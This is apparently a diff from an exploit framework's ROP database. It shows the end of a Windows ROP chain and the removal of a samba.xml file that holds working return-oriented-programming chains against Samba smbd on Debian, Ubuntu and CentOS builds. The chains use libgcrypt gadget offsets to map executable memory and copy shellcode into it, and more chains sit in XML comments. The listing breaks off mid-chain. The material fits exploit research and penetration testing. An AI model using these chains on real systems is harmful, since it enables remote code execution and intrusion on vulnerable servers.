<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
<gadget offset="0x2a8df">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x55093">pop edi # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x60bc4">call eax # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
<gadget offset="0x463d0">pop ebx # ret</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
</gadgets>
</rop>
</db>

436
data/ropdb/samba.xml
View File

@ -1,436 +0,0 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
</compatibility>
<!--
dpkg -l|grep libgcrypt
ii libgcrypt11 1.4.5-2 LGPL Crypto library - runtime library
b6977000-b69e8000 r-xp 00000000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
b69e8000-b69eb000 rw-p 00070000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
-->
<gadgets base="0">
<gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
<gadget offset="0x00071ad4">offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00071af4">mmap@got - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00009974">jmp eax</gadget>
<gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
<gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
<gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
<gadget offset="0x00063dbf">pop eax ; ret</gadget>
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
<gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00055743">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00071b6c">memcpy@got - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00055743">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<!-- set ecx to same value than edx -->
<gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
<gadget offset="0x0005c914"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006e61f"> xchg eax, esi ; ret ; || restore eax</gadget>
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
<gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0005b68a">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
</compatibility>
<!--
dpkg -l|grep libgcr
ii libgcrypt11 1.5.0-1 LGPL Crypto library - runtime library
b69e3000-b6a65000 r-xp 00000000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b6a65000-b6a66000 r**p 00081000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b6a66000-b6a68000 rw-p 00082000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
-->
<gadgets base="0">
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
<gadget offset="0x00082ff4">offset of .got.plt section</gadget>
<gadget offset="0x0006933f">pop eax; ret</gadget>
<gadget offset="0x000830a4">mmap@got - 4</gadget>
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00007d79">jmp eax</gadget>
<gadget offset="0x00005646">add esp, 0x1C; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00084000">edx = writable location, in GOT</gadget>
<gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget offset="0x00008532">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006933f">pop eax ; ret</gadget>
<gadget offset="0x00084100">eax = writable location, in GOT</gadget>
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
<gadget offset="0x00084100">ebx = writable location, in GOT</gadget>
<gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
<gadget value ="0x00000000">junk for ebx</gadget>
<gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
<gadget value ="0x00000000">junk for edi</gadget>
<gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0006933f">pop eax; ret</gadget>
<gadget offset="0x00083024">memcpy@got - 4</gadget>
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x00004803">pop esi ; ret</gadget>
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0001fdfa">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
</compatibility>
<!--
dpkg -l|grep libgcr
ii libgcrypt11 1.4.6-4ubuntu2 LGPL Crypto library - runtime library
b69f8000-b6a69000 r-xp 00000000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
b6a69000-b6a6a000 r**p 00070000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
b6a6a000-b6a6c000 rw-p 00071000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
4 first pops are after pop esp
-->
<gadgets base="0">
<gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x00072010">mmap@got - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00007f19">jmp eax</gadget>
<gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0005d903">xchg eax, edx ; ret || edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
<gadget offset="0x0005c45c">pop ecx ; ret</gadget>
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
<gadget offset="0x0005cd54">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x0007204c">memcpy@got - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x00060e5a">pop esi ; ret</gadget>
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0005baca">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
</compatibility>
<!--
dpkg -l|grep libgcrypt
ii libgcrypt11 1.4.5-2ubuntu1 LGPL Crypto library - runtime library
b6a20000-b6a91000 r-xp 00000000 08:01 17247 /lib/libgcrypt.so.11.5.3
b6a91000-b6a92000 r**p 00070000 08:01 17247 /lib/libgcrypt.so.11.5.3
b6a92000-b6a94000 rw-p 00071000 08:01 17247 /lib/libgcrypt.so.11.5.3
-->
<gadgets base="0">
<gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
<gadget offset="0x00071ff4">offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072010">mmap@got - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x0000922c">jmp eax</gadget>
<gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
<gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
<gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
<gadget offset="0x0006421f">pop eax ; ret</gadget>
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
<gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00043999">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072094">memcpy@got - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00043999">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<!-- set ecx to same value than edx -->
<gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
<gadget offset="0x0006421f">pop eax; ret</gadget>
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
<gadget offset="0x0005cd74"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006ea7f"> xchg eax, esi ; ret ; || restore eax</gadget>
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x000128cc">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>3.5.10-0.107.el5 on CentOS 5</target>
</compatibility>
<!--
yum list |grep libgcrypt
libgcrypt.i386 1.4.4-5.el5 installed
02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
section is writable and executable, we'll copy the shellcode over there instead of using mmap
-->
<gadgets base="0">
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
<gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
<gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
<gadget offset="0x0006a73f">pop eax ; ret</gadget>
<gadget offset="0x0007effc">memcpy@got - 4</gadget>
<gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
<gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
<gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
<gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
<gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">junk for ebp **1**</gadget>
<gadget offset="0x0006200a">pushad ; ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x0000f3b1">pop eax; ret</gadget>
<gadget offset="0x00991ff0">mmap64@got</gadget>
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x008c8997">jmp eax</gadget>
<gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x0034fbd2">pop edx ; ret</gadget>
<gadget offset="0x0099a000">edx = writable location, in GOT</gadget>
<gadget offset="0x0034c2bc">mov dword [edx], eax ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for esi</gadget>
<gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
<gadget offset="0x001a73b2">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x0008c5ac">pop eax; ret</gadget>
<gadget offset="0x00991904">memcpy@got</gadget>
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x001726b5">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0002ab2c">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x0000f445">pop eax; ret</gadget>
<gadget offset="0x008c1008">mmap64@got</gadget>
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x0009e8e4">jmp eax</gadget>
<gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x001f6142">pop edx ; ret</gadget>
<gadget offset="0x008c9000">edx = writable location, in GOT</gadget>
<gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
<gadget offset="0x00277540">pop ebp ; ret</gadget>
<gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0000f445">pop eax; ret</gadget>
<gadget offset="0x008c0964">memcpy@got</gadget>
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0000dbcf">pushad, ret</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
-->
<!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6
<compatibility
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
</compatibility>
<gadgets base="0">
<gadget offset="0x00021cd9">pop eax; ret</gadget>
<gadget offset="0x008cf86c">mmap64@got</gadget>
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
<gadget offset="0x000234e5">jmp eax</gadget>
<gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
<gadget offset="0x0001cf12">pop edx ; ret</gadget>
<gadget offset="0x008d6000">edx = writable location, in GOT</gadget>
<gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x00394107">pop ebp ; ret</gadget>
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
<gadget offset="0x0017892d">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
<gadget offset="0x00021cd9">pop eax; ret</gadget>
<gadget offset="0x008cf1e8">memcpy@got</gadget>
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0001f666">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
